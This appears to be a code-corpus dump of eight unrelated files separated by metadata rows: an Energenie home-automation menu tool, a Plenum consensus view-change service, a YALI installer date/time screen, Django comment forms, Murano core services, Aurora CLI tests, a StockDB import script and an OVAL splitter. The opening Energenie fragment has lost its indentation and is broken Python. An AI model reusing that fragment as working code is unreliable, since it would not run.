return None # user abort
try:
house_code = int(hc, 16)
return house_code
except ValueError:
print("Must enter a number")
def get_device_index():
"""get switch index, default 1 (0,1,2,3,4)"""
while True:
try:
di = readin("Device index 1..4 (ENTER for all)? ")
except KeyboardInterrupt:
return None # user abort
if di == "": return 0 # ALL
try:
device_index = int(di)
return device_index
except ValueError:
print("Must enter a number")
def show_registry():
"""Show the registry as a numbered list"""
i=1
names = []
for name in energenie.registry.names():
print("%d. %s %s" % (i, name, energenie.registry.get(name)))
names.append(name)
i += 1
return names
def get_device_name():
"""Give user a list of devices and choose one from the list"""
names = show_registry()
try:
while True:
i = readin("Which device %s to %s? " % (1, len(names)))
try:
device_index = int(i)
if device_index < 1 or device_index > len(names):
print("Choose a number between %s and %s" % (1, len(names)))
else:
break # got it
except ValueError:
print("Must enter a number")
except KeyboardInterrupt:
return None # nothing chosen, user aborted
name = names[device_index-1]
print("selected: %s" % name)
return name
#===== ACTION ROUTINES ========================================================
def do_legacy_learn():
"""Repeatedly broadcast a legacy switch message, so you can learn a socket to the pattern"""
# get device
house_code = get_house_code()
device_index = get_device_index()
# Use a MiHomeLight as it has the longest TX time
device = energenie.Devices.MIHO008((house_code, device_index))
# in a loop until Ctrl-C
print("Legacy learn broadcasting, Ctrl-C to stop")
try:
while True:
print("ON")
device.turn_on()
time.sleep(0.5)
print("OFF")
device.turn_off()
time.sleep(0.5)
except KeyboardInterrupt:
pass # user exit
def do_mihome_discovery():
"""Discover any mihome device when it sends reports"""
print("Discovery mode, press Ctrl-C to stop")
energenie.discovery_ask(energenie.ask)
try:
while True:
energenie.loop() # Allow receive processing
time.sleep(0.25) # tick fast enough to get messages in quite quickly
except KeyboardInterrupt:
print("Discovery stopped")
def do_list_registry():
"""List the entries in the registry"""
print("REGISTRY:")
show_registry()
energenie.registry.fsk_router.list()
def do_switch_device():
"""Turn the switch on a socket on and off, to test it"""
global quit
name = get_device_name()
device = energenie.registry.get(name)
def on():
print("Turning on")
device.turn_on()
def off():
print("Turning off")
device.turn_off()
MENU = [
("on", on),
("off", off)
]
try:
while not quit:
show_menu(MENU)
choice = get_choice((1,len(MENU)))
if choice != None:
handle_choice(MENU, choice)
except KeyboardInterrupt:
pass # user exit
quit = False
def do_show_device_status():
"""Show the readings associated with a device"""
name = get_device_name()
device = energenie.registry.get(name)
readings = device.get_readings_summary()
print(readings)
def do_watch_devices():
"""Repeatedly show readings for all devices"""
print("Watching devices, Ctrl-C to stop")
try:
while True:
energenie.loop() # allow receive processing
print('-' * 80)
names = energenie.registry.names()
for name in names:
device = energenie.registry.get(name)
readings = device.get_readings_summary()
print("%s %s" % (name, readings))
print("")
time.sleep(1)
except KeyboardInterrupt:
pass # user exit
def do_rename_device():
"""Rename a device in the registry to a different name"""
# This is useful when turning auto discovered names into your own names
old_name = get_device_name()
if old_name == None: return # user abort
try:
new_name = readin("New name? ")
except KeyboardInterrupt:
return # user abort
energenie.registry.rename(old_name, new_name)
print("Renamed OK")
def do_delete_device():
"""Delete a device from the registry so it is no longer recognised"""
name = get_device_name()
if name == None: return #user abort
energenie.registry.delete(name)
print("Deleted OK")
def do_logging():
"""Enter a mode where all communications are logged to screen and a file"""
import Logger
# provide a default incoming message handler for all fsk messages
def incoming(address, message):
print("\nIncoming from %s" % str(address))
print(message)
Logger.logMessage(message)
energenie.fsk_router.when_incoming(incoming)
print("Logging enabled, Ctrl-C to stop")
try:
while True:
energenie.loop()
except KeyboardInterrupt:
pass #user quit
finally:
energenie.fsk_router.when_incoming(None)
def do_quit():
"""Finished with the program, so exit"""
global quit
quit = True
#===== MENU ===================================================================
def show_menu(menu):
"""Display a menu on the console"""
i = 1
for item in menu:
print("%d. %s" % (i, item[0]))
i += 1
def get_choice(choices):
"""Get and validate a numberic choice from the tuple choices(first, last)"""
first = choices[0]
last = choices[1]
try:
while True:
choice = readin("Choose %d to %d? " % (first, last))
try:
choice = int(choice)
if choice < first or choice > last:
print("Must enter a number between %d and %d" % (first, last))
else:
return choice
except ValueError:
print("Must enter a number")
except KeyboardInterrupt:
do_quit()
def handle_choice(menu, choice):
"""Route to the handler for the given menu choice"""
menu[choice-1][1]()
MAIN_MENU = [
("legacy learn mode", do_legacy_learn),
("mihome discovery mode", do_mihome_discovery),
("list registry", do_list_registry),
("switch device", do_switch_device),
("show device status", do_show_device_status),
("watch devices", do_watch_devices),
("rename device", do_rename_device),
("delete device", do_delete_device),
("logging", do_logging),
("quit", do_quit)
]
#===== MAIN PROGRAM ===========================================================
def setup_tool():
"""The main program loop"""
while not quit:
print("\nMAIN MENU")
show_menu(MAIN_MENU)
choice = get_choice((1,len(MAIN_MENU)))
if not quit:
print("\n")
handle_choice(MAIN_MENU, choice)
if __name__ == "__main__":
energenie.init()
try:
setup_tool()
finally:
energenie.finished()
# END
| mit | -7,787,318,702,676,229,000 | 23.235795 | 96 | 0.553745 | false | 3.988312 | false | false | false |
evernym/zeno | plenum/server/consensus/view_change_trigger_service.py | 2 | 7315 | from typing import Callable
from plenum.common.config_util import getConfig
from plenum.common.constants import NODE_STATUS_DB_LABEL, VIEW_CHANGE_PREFIX
from plenum.common.event_bus import InternalBus, ExternalBus
from plenum.common.messages.internal_messages import VoteForViewChange, NodeNeedViewChange, NewViewAccepted
from plenum.common.messages.node_messages import InstanceChange
from plenum.common.metrics_collector import MetricsCollector, NullMetricsCollector
from plenum.common.router import Subscription
from plenum.common.stashing_router import StashingRouter, DISCARD
from plenum.common.timer import TimerService
from plenum.server.consensus.consensus_shared_data import ConsensusSharedData
from plenum.server.consensus.utils import replica_name_to_node_name
from plenum.server.database_manager import DatabaseManager
from plenum.server.replica_validator_enums import STASH_CATCH_UP, CATCHING_UP
from plenum.server.suspicion_codes import Suspicions, Suspicion
from plenum.server.view_change.instance_change_provider import InstanceChangeProvider
from stp_core.common.log import getlogger
logger = getlogger()
class ViewChangeTriggerService:
def __init__(self,
data: ConsensusSharedData,
timer: TimerService,
bus: InternalBus,
network: ExternalBus,
db_manager: DatabaseManager,
stasher: StashingRouter,
is_master_degraded: Callable[[], bool],
metrics: MetricsCollector = NullMetricsCollector()):
self._data = data
self._timer = timer
self._bus = bus
self._network = network
self._stasher = stasher
self._is_master_degraded = is_master_degraded
self.metrics = metrics
self._config = getConfig()
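        # Assumption: votes are kept per view in the node status store and treated as outdated after OUTDATED_INSTANCE_CHANGES_CHECK_INTERVAL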
self._instance_changes = \
InstanceChangeProvider(outdated_ic_interval=self._config.OUTDATED_INSTANCE_CHANGES_CHECK_INTERVAL,
node_status_db=db_manager.get_store(NODE_STATUS_DB_LABEL),
time_provider=timer.get_current_time)
self._subscription = Subscription()
self._subscription.subscribe(bus, VoteForViewChange, self.process_vote_for_view_change)
self._subscription.subscribe(bus, NewViewAccepted, self.process_new_view_accepted)
self._subscription.subscribe(stasher, InstanceChange, self.process_instance_change)
def cleanup(self):
self._subscription.unsubscribe_all()
@property
def name(self):
return replica_name_to_node_name(self._data.name)
def __repr__(self):
return self.name
def process_vote_for_view_change(self, msg: VoteForViewChange):
proposed_view_no = self._data.view_no
# TODO: Some time ago it was proposed that view_no should not be increased during proposal
# if view change is already in progress, unless suspicion code is "view change is taking too long".
# Idea was to improve stability of view change triggering, however for some reason this change lead
# to lots of failing/flaky tests. This still needs to be investigated.
# if suspicion == Suspicions.INSTANCE_CHANGE_TIMEOUT or not self.view_change_in_progress:
if msg.suspicion != Suspicions.STATE_SIGS_ARE_NOT_UPDATED or not self._data.waiting_for_new_view:
proposed_view_no += 1
if msg.view_no is not None:
proposed_view_no = msg.view_no
self._send_instance_change(proposed_view_no, msg.suspicion)
def process_instance_change(self, msg: InstanceChange, frm: str):
frm = replica_name_to_node_name(frm)
# TODO: Do we really need this?
if frm not in self._network.connecteds:
return DISCARD, "instance change request: {} from {} which is not in connected list: {}".\
format(msg, frm, self._network.connecteds)
if not self._data.is_participating:
return STASH_CATCH_UP, CATCHING_UP
logger.info("{} received instance change request: {} from {}".format(self, msg, frm))
if msg.viewNo <= self._data.view_no:
return DISCARD, "instance change request with view no {} which is not more than its view no {}".\
format(msg.viewNo, self._data.view_no)
# Record instance changes for views but send instance change
# only when found master to be degraded. if quorum of view changes
# found then change view even if master not degraded
self._on_verified_instance_change_msg(msg, frm)
if self._instance_changes.has_inst_chng_from(msg.viewNo, self.name):
logger.info("{} received instance change message {} "
"but has already sent an instance change message".format(self, msg))
elif not self._is_master_degraded():
logger.info("{} received instance change message {} "
"but did not find the master to be slow".format(self, msg))
else:
logger.display("{}{} found master degraded after "
"receiving instance change message from {}".format(VIEW_CHANGE_PREFIX, self, frm))
self._send_instance_change(msg.viewNo, Suspicions.PRIMARY_DEGRADED)
def process_new_view_accepted(self, msg: NewViewAccepted):
self._instance_changes.remove_view(self._data.view_no)
def _send_instance_change(self, view_no: int, suspicion: Suspicion):
logger.info("{}{} sending an instance change with view_no {} since {}".
format(VIEW_CHANGE_PREFIX, self, view_no, suspicion.reason))
msg = InstanceChange(view_no, suspicion.code)
self._network.send(msg)
# record instance change vote for self and try to change the view if quorum is reached
self._on_verified_instance_change_msg(msg, self.name)
def _on_verified_instance_change_msg(self, msg: InstanceChange, frm: str):
view_no = msg.viewNo
if not self._instance_changes.has_inst_chng_from(view_no, frm):
self._instance_changes.add_vote(msg, frm)
if view_no > self._data.view_no:
self._try_start_view_change_by_instance_change(view_no)
def _try_start_view_change_by_instance_change(self, proposed_view_no: int) -> bool:
# TODO: Need to handle skewed distributions which can arise due to
# malicious nodes sending messages early on
can, why_not = self._can_view_change(proposed_view_no)
if can:
logger.display("{}{} initiating a view change to {} from {}".
format(VIEW_CHANGE_PREFIX, self, proposed_view_no, self._data.view_no))
self._bus.send(NodeNeedViewChange(view_no=proposed_view_no))
else:
logger.info(why_not)
return can
def _can_view_change(self, proposed_view_no: int) -> (bool, str):
quorum = self._data.quorums.view_change.value
if not self._instance_changes.has_quorum(proposed_view_no, quorum):
return False, '{} has no quorum for view {}'.format(self, proposed_view_no)
if not proposed_view_no > self._data.view_no:
return False, '{} is in higher view more than {}'.format(self, proposed_view_no)
return True, ''
| apache-2.0 | 5,930,155,047,965,912,000 | 49.10274 | 110 | 0.662064 | false | 3.847975 | false | false | false |
akuster/yali | yali/gui/ScrDateTime.py | 1 | 8166 | # -*- coding: utf-8 -*-
#
# Copyright (C) 2008-2010 TUBITAK/UEKAE
#
# This program is free software; you can redistribute it and/or modify it under
# the terms of the GNU General Public License as published by the Free
# Software Foundation; either version 2 of the License, or (at your option)
# any later version.
#
# Please read the COPYING file.
#
import gettext
_ = gettext.translation('yali', fallback=True).ugettext
from PyQt4.Qt import QWidget, SIGNAL, QTimer, QDate, QComboBox, QTime
from pds.thread import PThread
from pds.gui import PMessageBox, MIDCENTER, CURRENT, OUT
import yali.localedata
import yali.context as ctx
import yali.postinstall
import yali.storage
from yali.gui import ScreenWidget
from yali.gui.Ui.datetimewidget import Ui_DateTimeWidget
from yali.timezone import TimeZoneList
class Widget(QWidget, ScreenWidget):
name = "timeSetup"
def __init__(self):
QWidget.__init__(self)
self.ui = Ui_DateTimeWidget()
self.ui.setupUi(self)
self.timer = QTimer(self)
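        # from_time_updater marks programmatic clock updates so timerStop() only reacts to real user edits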
self.from_time_updater = True
self.is_date_changed = False
self.current_zone = ""
self.tz_dict = {}
self.continents = []
self.countries = []
for country, data in yali.localedata.locales.items():
if country == ctx.consts.lang:
if data.has_key("timezone"):
ctx.installData.timezone = data["timezone"]
# Append continents and countries the time zone dictionary
self.createTZDictionary()
# Sort continent list
self.sortContinents()
# Append sorted continents to combobox
self.loadContinents()
# Load current continents country list
self.getCountries(self.current_zone["continent"])
# Highlight the current zone
self.index = self.ui.continentList.findText(self.current_zone["continent"])
self.ui.continentList.setCurrentIndex(self.index)
self.index = self.ui.countryList.findText(self.current_zone["country"])
self.ui.countryList.setCurrentIndex(self.index)
# Initialize widget signal and slots
self.__initSignals__()
self.ui.calendarWidget.setDate(QDate.currentDate())
self.pthread = None
self.pds_messagebox = PMessageBox(self)
self.pds_messagebox.enableOverlay()
self.timer.start(1000)
def __initSignals__(self):
self.connect(self.ui.timeEdit, SIGNAL("timeChanged(QTime)"), self.timerStop)
self.connect(self.ui.calendarWidget, SIGNAL("selectionChanged()"), self.dateChanged)
self.connect(self.timer, SIGNAL("timeout()"), self.updateClock)
self.connect(self.ui.continentList, SIGNAL("activated(QString)"), self.getCountries)
def createTZDictionary(self):
tz = TimeZoneList()
zones = [ x.timeZone for x in tz.getEntries() ]
zones.sort()
for zone in zones:
split = zone.split("/")
# Human readable continent names
            continent_pretty_name = split[0].replace("_", " ")
# Some country names can be like Argentina/Catamarca so this fixes the splitting problem
# caused by zone.split("/")
#
# Remove continent info and take the rest as the country name
split.pop(0)
country_pretty_name = " / ".join(split)
# Human readable country names
country_pretty_name = country_pretty_name.replace("_", " ")
# Get current zone
if zone == ctx.installData.timezone:
self.current_zone = { "continent":continent_pretty_name, "country":country_pretty_name}
# Append to dictionary
if self.tz_dict.has_key(continent_pretty_name):
self.tz_dict[continent_pretty_name].append([country_pretty_name, zone])
else:
self.tz_dict[continent_pretty_name] = [[country_pretty_name, zone]]
def sortContinents(self):
for continent in self.tz_dict.keys():
self.continents.append(continent)
self.continents.sort()
def loadContinents(self):
for continent in self.continents:
self.ui.continentList.addItem(continent)
def getCountries(self, continent):
# Countries of the selected continent
countries = self.tz_dict[str(continent)]
self.ui.countryList.clear()
for country, zone in countries:
self.ui.countryList.addItem(country, zone)
self.countries.append(country)
def dateChanged(self):
self.is_date_changed = True
def timerStop(self):
if self.from_time_updater:
return
# Human action detected; stop the timer.
self.timer.stop()
def updateClock(self):
# What time is it ?
cur = QTime.currentTime()
self.from_time_updater = True
self.ui.timeEdit.setTime(cur)
self.from_time_updater = False
def shown(self):
self.timer.start(1000)
if ctx.flags.install_type == ctx.STEP_BASE:
self.pthread = PThread(self, self.startInit, self.dummy)
def dummy(self):
pass
def setTime(self):
ctx.interface.informationWindow.update(_("Adjusting time settings"))
date = self.ui.calendarWidget.date()
time = self.ui.timeEdit.time()
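        # date(1) expects MMDDhhmmCCYY.ss, which the format string below produces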
args = "%02d%02d%02d%02d%04d.%02d" % (date.month(), date.day(),
time.hour(), time.minute(),
date.year(), time.second())
# Set current date and time
ctx.logger.debug("Date/Time setting to %s" % args)
yali.util.run_batch("date", [args])
# Sync date time with hardware
ctx.logger.debug("YALI's time is syncing with the system.")
yali.util.run_batch("hwclock", ["--systohc"])
ctx.interface.informationWindow.hide()
def execute(self):
if not self.timer.isActive() or self.is_date_changed:
QTimer.singleShot(500, self.setTime)
self.timer.stop()
index = self.ui.countryList.currentIndex()
ctx.installData.timezone = self.ui.countryList.itemData(index).toString()
ctx.logger.debug("Time zone selected as %s " % ctx.installData.timezone)
if ctx.flags.install_type == ctx.STEP_BASE:
#FIXME:Refactor hacky code
ctx.installData.rootPassword = ctx.consts.default_password
ctx.installData.hostName = yali.util.product_release()
if ctx.storageInitialized:
disks = filter(lambda d: not d.format.hidden, ctx.storage.disks)
if len(disks) == 1:
ctx.storage.clearPartDisks = [disks[0].name]
ctx.mainScreen.step_increment = 2
else:
ctx.mainScreen.step_increment = 1
return True
else:
self.pds_messagebox.setMessage(_("Storage Devices initialising..."))
self.pds_messagebox.animate(start=MIDCENTER, stop=MIDCENTER)
ctx.mainScreen.step_increment = 0
self.pthread.start()
QTimer.singleShot(2, self.startStorageInitialize)
return False
return True
def startInit(self):
self.pds_messagebox.animate(start=MIDCENTER, stop=MIDCENTER)
def startStorageInitialize(self):
ctx.storageInitialized = yali.storage.initialize(ctx.storage, ctx.interface)
self.initFinished()
def initFinished(self):
self.pds_messagebox.animate(start=CURRENT, stop=CURRENT, direction=OUT)
disks = filter(lambda d: not d.format.hidden, ctx.storage.disks)
if ctx.storageInitialized:
if len(disks) == 1:
ctx.storage.clearPartDisks = [disks[0].name]
ctx.mainScreen.step_increment = 2
else:
ctx.mainScreen.step_increment = 1
ctx.mainScreen.slotNext(dry_run=True)
else:
ctx.mainScreen.enableBack()
| gpl-2.0 | -7,855,595,690,134,043,000 | 33.744681 | 103 | 0.615064 | false | 3.97517 | false | false | false |
ella/ella-comments | ella_comments/forms.py | 1 | 1988 | from django.contrib.contenttypes.models import ContentType
from django.utils.encoding import force_unicode
from django.conf import settings
from ella.utils.timezone import now
from threadedcomments.forms import ThreadedCommentForm
class AuthorizedCommentForm(ThreadedCommentForm):
user = None
def __init__(self, *args, **kwargs):
"there is no such thing as user_name, user_email, user_url"
super(AuthorizedCommentForm, self).__init__(*args, **kwargs)
self.fields.pop('name')
self.fields.pop('email')
self.fields.pop('url')
def check_for_duplicate_comment(self, new):
"""
        copied from ``django.contrib.comments.forms`` so that the decision of
        which db to use is left to the database router
"""
possible_duplicates = self.get_comment_model()._default_manager.filter(
content_type = new.content_type,
object_pk = new.object_pk,
user_name = new.user_name,
user_email = new.user_email,
user_url = new.user_url,
)
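        # A duplicate is a same-day comment with identical text on the same object by the same author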
for old in possible_duplicates:
if old.submit_date.date() == new.submit_date.date() and old.comment == new.comment:
return old
return new
def get_comment_create_data(self):
"so remove it from comment create date"
return dict(
parent_id = self.cleaned_data['parent'],
title = self.cleaned_data['title'],
content_type = ContentType.objects.get_for_model(self.target_object),
object_pk = force_unicode(self.target_object._get_pk_val()),
user_name = self.user.get_full_name() or self.user.username,
user_email = self.user.email,
comment = self.cleaned_data["comment"],
submit_date = now(),
site_id = settings.SITE_ID,
is_public = True,
is_removed = False,
)
| bsd-3-clause | -4,359,619,489,563,180,500 | 36.509434 | 95 | 0.600604 | false | 4.016162 | false | false | false |
chenyujie/hybrid-murano | murano/db/services/core_services.py | 1 | 8760 | # Copyright (c) 2013 Mirantis, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import types
from oslo_utils import timeutils
from webob import exc
from murano.common.i18n import _
from murano.common import utils
from murano.db.services import environment_templates as env_temp
from murano.db.services import environments as envs
from murano.openstack.common import log as logging
LOG = logging.getLogger(__name__)
class CoreServices(object):
@staticmethod
def get_service_status(environment_id, service_id):
"""Service can have one of three distinguished statuses:
- Deploying: if environment has status deploying and there is at least
one orchestration engine report for this service;
- Pending: if environment has status `deploying` and there is no
report from orchestration engine about this service;
- Ready: If environment has status ready.
        :param environment_id: Id of the environment the service belongs to
        :param service_id: Id of the service whose status is being checked
:return: Service status
"""
# Now we assume that service has same status as environment.
# TODO(ruhe): implement as designed and described above
return envs.EnvironmentServices.get_status(environment_id)
@staticmethod
def get_data(environment_id, path, session_id=None):
get_description = envs.EnvironmentServices.get_environment_description
env_description = get_description(environment_id, session_id)
if env_description is None:
return None
if 'services' not in env_description:
return []
result = utils.TraverseHelper.get(path, env_description)
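        # When listing all services, annotate each entry with its current deployment status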
if path == '/services':
get_status = CoreServices.get_service_status
for srv in result:
srv['?']['status'] = get_status(environment_id, srv['?']['id'])
return result
@staticmethod
def get_template_data(env_template_id, path):
"""It obtains the data for the template. It includes
all the services. In case the path includes information
such as the env_template_id, the information provided will
be related to the entity specified in the path
:param env_template_id: The env_template_id to obtain the data
:param path: Id of service for which we checking status.
:return: The template description
"""
temp_description = env_temp.EnvTemplateServices.\
get_description(env_template_id)
if temp_description is None:
return None
if 'services' not in temp_description:
return []
result = utils.TraverseHelper.get(path, temp_description)
if result is None:
msg = _('Environment Template <EnvId {0}> is not found').format(
env_template_id)
LOG.error(msg)
raise exc.HTTPNotFound(explanation=msg)
return result
@staticmethod
def post_env_template_data(env_template_id, data, path):
"""It stores the template data inside the template
description.
:param env_template_id: The env_template_id to obtain the data
:param data: the template description
:param path: Id of service for which we checking status.
:return: The template description
"""
get_description = env_temp.EnvTemplateServices.get_description
save_description = env_temp.EnvTemplateServices.save_description
temp_description = get_description(env_template_id)
if temp_description is None:
msg = _('Environment Template <EnvId {0}> is not found').format(
env_template_id)
LOG.error(msg)
raise exc.HTTPNotFound(explanation=msg)
if 'services' not in temp_description:
temp_description['services'] = []
if path == '/services':
if isinstance(data, types.ListType):
utils.TraverseHelper.extend(path, data, temp_description)
else:
utils.TraverseHelper.insert(path, data, temp_description)
save_description(temp_description)
return data
@staticmethod
def post_application_data(env_template_id, data, path):
"""It stores the application data inside the template
description.
:param env_template_id: The env_template_id to obtain the data
:param data: the template description
:param path: Id of service for which we checking status.
:return: The template description
"""
get_description = env_temp.EnvTemplateServices.get_description
save_description = env_temp.EnvTemplateServices.save_description
temp_description = get_description(env_template_id)
if temp_description is None:
msg = _('Environment Template <EnvId {0}> is not found').format(
env_template_id)
LOG.error(msg)
raise exc.HTTPNotFound(explanation=msg)
if 'services' not in temp_description:
temp_description['services'] = []
if path == '/services':
if isinstance(data, types.ListType):
utils.TraverseHelper.extend(path, data, temp_description)
else:
utils.TraverseHelper.insert(path, data, temp_description)
save_description(temp_description, env_template_id)
return data
@staticmethod
def post_data(environment_id, session_id, data, path):
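        """Add the given data to the environment description at the given
        path and save the updated description within the session.
        :param environment_id: Id of the environment to update
        :param session_id: Id of the configuration session
        :param data: The data to add
        :param path: Path inside the description where the data is added
        :return: The data that was added
        """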
get_description = envs.EnvironmentServices.get_environment_description
save_description = envs.EnvironmentServices.\
save_environment_description
env_description = get_description(environment_id, session_id)
if env_description is None:
msg = _('Environment <EnvId {0}> is not found').format(
environment_id)
LOG.error(msg)
raise exc.HTTPNotFound(explanation=msg)
if 'services' not in env_description:
env_description['services'] = []
if path == '/services':
if isinstance(data, types.ListType):
utils.TraverseHelper.extend(path, data, env_description)
else:
utils.TraverseHelper.insert(path, data, env_description)
save_description(session_id, env_description)
return data
@staticmethod
def put_data(environment_id, session_id, data, path):
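        """Replace the data at the given path in the environment description,
        refresh the 'updated' timestamp and save the description.
        :param environment_id: Id of the environment to update
        :param session_id: Id of the configuration session
        :param data: The new data for the given path
        :param path: Path inside the description to update
        :return: The data that was set
        """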
get_description = envs.EnvironmentServices.get_environment_description
save_description = envs.EnvironmentServices.\
save_environment_description
env_description = get_description(environment_id, session_id)
utils.TraverseHelper.update(path, data, env_description)
env_description['?']['updated'] = str(timeutils.utcnow())
save_description(session_id, env_description)
return data
@staticmethod
def delete_data(environment_id, session_id, path):
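        """Remove the element at the given path from the environment
        description and save the updated description.
        :param environment_id: Id of the environment to update
        :param session_id: Id of the configuration session
        :param path: Path of the element to remove
        """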
get_description = envs.EnvironmentServices.get_environment_description
save_description = envs.EnvironmentServices.\
save_environment_description
env_description = get_description(environment_id, session_id)
utils.TraverseHelper.remove(path, env_description)
save_description(session_id, env_description)
@staticmethod
def delete_env_template_data(env_template_id, path):
"""It deletes a template.
:param env_template_id: The env_template_id to be deleted.
:param path: The path to check.
"""
get_description = env_temp.EnvTemplateServices.get_description
save_description = env_temp.EnvTemplateServices.save_description
tmp_description = get_description(env_template_id)
if tmp_description is None:
msg = _('Environment Template <EnvId {0}> is not found').format(
env_template_id)
LOG.error(msg)
raise exc.HTTPNotFound(explanation=msg)
utils.TraverseHelper.remove(path, tmp_description)
save_description(tmp_description, env_template_id)
| apache-2.0 | 3,541,658,079,617,387,000 | 37.086957 | 79 | 0.651826 | false | 4.43769 | false | false | false |
thinker0/aurora | src/test/python/apache/aurora/client/cli/test_config_noun.py | 8 | 3071 | #
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import textwrap
from mock import patch
from twitter.common.contextutil import temporary_file
from apache.aurora.client.cli import EXIT_COMMAND_FAILURE
from apache.aurora.client.cli.client import AuroraCommandLine
from .util import AuroraClientCommandTest, FakeAuroraCommandContext
class TestClientCreateCommand(AuroraClientCommandTest):
def test_list_configs(self):
mock_context = FakeAuroraCommandContext()
with patch('apache.aurora.client.cli.config.ConfigNoun.create_context',
return_value=mock_context):
with temporary_file() as fp:
fp.write(self.get_valid_config())
fp.flush()
cmd = AuroraCommandLine()
cmd.execute(['config', 'list', fp.name])
assert mock_context.out == ['jobs=[west/bozo/test/hello]']
assert mock_context.err == []
def test_list_configs_invalid(self):
mock_context = FakeAuroraCommandContext()
with patch('apache.aurora.client.cli.config.ConfigNoun.create_context',
return_value=mock_context):
with temporary_file() as fp:
fp.write(self.get_invalid_config("blather=..."))
fp.flush()
cmd = AuroraCommandLine()
result = cmd.execute(['config', 'list', fp.name])
assert result == EXIT_COMMAND_FAILURE
assert mock_context.out == []
assert any(line.startswith("Error loading configuration file: invalid syntax") for line in
mock_context.err)
def get_config_with_no_jobs(self):
return textwrap.dedent("""
HELLO_WORLD = Job(
name = '%(job)s',
role = '%(role)s',
cluster = '%(cluster)s',
environment = '%(env)s',
instances = 20,
update_config = UpdateConfig(
batch_size = 5,
watch_secs = 10,
max_per_shard_failures = 2,
),
task = Task(
name = 'test',
processes = [Process(name = 'hello_world', cmdline = 'echo {{thermos.ports[http]}}')],
resources = Resources(cpu = 0.1, ram = 64 * MB, disk = 64 * MB),
)
)
""")
def test_list_configs_nojobs(self):
mock_context = FakeAuroraCommandContext()
with patch('apache.aurora.client.cli.config.ConfigNoun.create_context',
return_value=mock_context):
with temporary_file() as fp:
fp.write(self.get_config_with_no_jobs())
fp.flush()
cmd = AuroraCommandLine()
cmd.execute(['config', 'list', fp.name])
assert mock_context.out == ["jobs=[]"]
assert mock_context.err == []
| apache-2.0 | -1,368,451,864,984,185,300 | 35.129412 | 98 | 0.648323 | false | 3.758874 | true | false | false |
azylstra/StockDB | run.py | 1 | 1191 | #!/usr/bin/python3
# Run the regular daily import of data, with error logging
#
# Author: Alex Zylstra
# Date: 2014/05/17
# License: MIT
from DB import DB, FILE
from scripts import *
from fetch import *
import datetime
import logging
logging.basicConfig(filename='StockDB.log',level=logging.INFO)
import smtplib
def run():
"""Run the daily data import."""
errors = add_all_to_db()
for err in errors:
logging.error("Error: {0}".format(err))
# Attempt to email:
try:
dt = datetime.date.today()
date = str(dt.year) + '-' + str(dt.month) + '-' + str(dt.day)
fromaddr = '[email protected]'
toaddrs = '[email protected]'.split()
# Construct the message
subject = "StockDB report"
body = 'Date: ' + date + '\n'
body += 'Number of errors: ' + str(len(errors)) + '\n\n'
for err in errors:
body += "Error: {0}".format(err) + '\n'
msg = 'Subject: %s\n\n%s' % (subject, body)
server = smtplib.SMTP('localhost')
server.sendmail(fromaddr, toaddrs, msg)
server.quit()
except Exception as err:
logging.error("Error: {0}".format(err))
run() | mit | 954,289,888,926,774,900 | 26.090909 | 69 | 0.5911 | false | 3.326816 | false | false | false |
mpalmi/clip | packages/scap-security-guide/scap-security-guide-0.1.25/shared/modules/splitchecks_module.py | 4 | 3741 | #!/usr/bin/python
import sys
import os
import errno
import string
import re
from optparse import OptionParser
import lxml.etree as ET
xmlns = {
"o": "http://oval.mitre.org/XMLSchema/oval-definitions-5",
"xsi": "http://www.w3.org/2001/XMLSchema-instance",
"oval": "http://oval.mitre.org/XMLSchema/oval-common-5",
"unix": "http://oval.mitre.org/XMLSchema/oval-definitions-5#unix",
"linux": "http://oval.mitre.org/XMLSchema/oval-definitions-5#linux",
"ind": "http://oval.mitre.org/XMLSchema/oval-definitions-5#independent",
}
def parse_options():
usage = "usage: %prog [options] input_file [input_file . . .]"
parser = OptionParser(usage=usage, version="%prog ")
parser.add_option("-o", dest="out_dname", default="/tmp/checks",
help="name of output directory. If unspecified, default is a new directory \"/tmp/checks\"")
(options, args) = parser.parse_args()
if len(args) < 1:
parser.print_help()
sys.exit(1)
return (options, args)
# look for any occurrences of these attributes, and then gather the node
# referenced
def gather_refs(element, defn):
items_with_refs = element.findall(".//*[@test_ref]")
items_with_refs.extend(element.findall(".//*[@var_ref]"))
items_with_refs.extend(element.findall(".//*[@state_ref]"))
items_with_refs.extend(element.findall(".//*[@object_ref]"))
for item in items_with_refs:
for attr in item.attrib.keys():
if attr.endswith("_ref"):
ident = item.get(attr)
referenced_item = id_element_map[ident]
if referenced_item not in def_reflist_map[defn]:
def_reflist_map[defn].append(referenced_item)
gather_refs(referenced_item, defn)
def gather_refs_for_defs(tree):
defn_elements = tree.getiterator("{" + xmlns["o"] + "}definition")
# initialize dictionary, which maps definitions to a list of those things
# it references
for defn in defn_elements:
def_reflist_map[defn] = []
for defn in defn_elements:
gather_refs(defn, defn)
def output_checks(dname):
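    """Write each OVAL definition and everything it references into its own
    XML file (named after the sanitized definition id) inside dname, wrapped
    in a <def-group> element."""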
try:
os.makedirs(dname)
except OSError, e:
if e.errno != errno.EEXIST:
raise
# use namespace prefix-to-uri defined above, to provide abbreviations
for prefix, uri in xmlns.iteritems():
ET.register_namespace(prefix, uri)
os.chdir(dname)
for defn, reflist in def_reflist_map.iteritems():
# create filename from id attribute, get rid of punctuation
fname = defn.get("id")
fname = fname.translate(string.maketrans("", ""),
string.punctuation) + ".xml"
# output definition, and then all elements that the definition
# references
outstring = ET.tostring(defn)
for ref in reflist:
outstring = outstring + ET.tostring(ref)
with open(fname, 'w+') as xml_file:
# giant kludge: get rid of per-node namespace attributes
outstring = re.sub(r"\s+xmlns[^\s]+ ", " ", outstring)
xml_file.write("<def-group>\n" + outstring + "</def-group>")
return
def gather_ids_for_elements(tree):
for element in tree.findall(".//*[@id]"):
id_element_map[element.get("id")] = element
id_element_map = {} # map of ids to elements
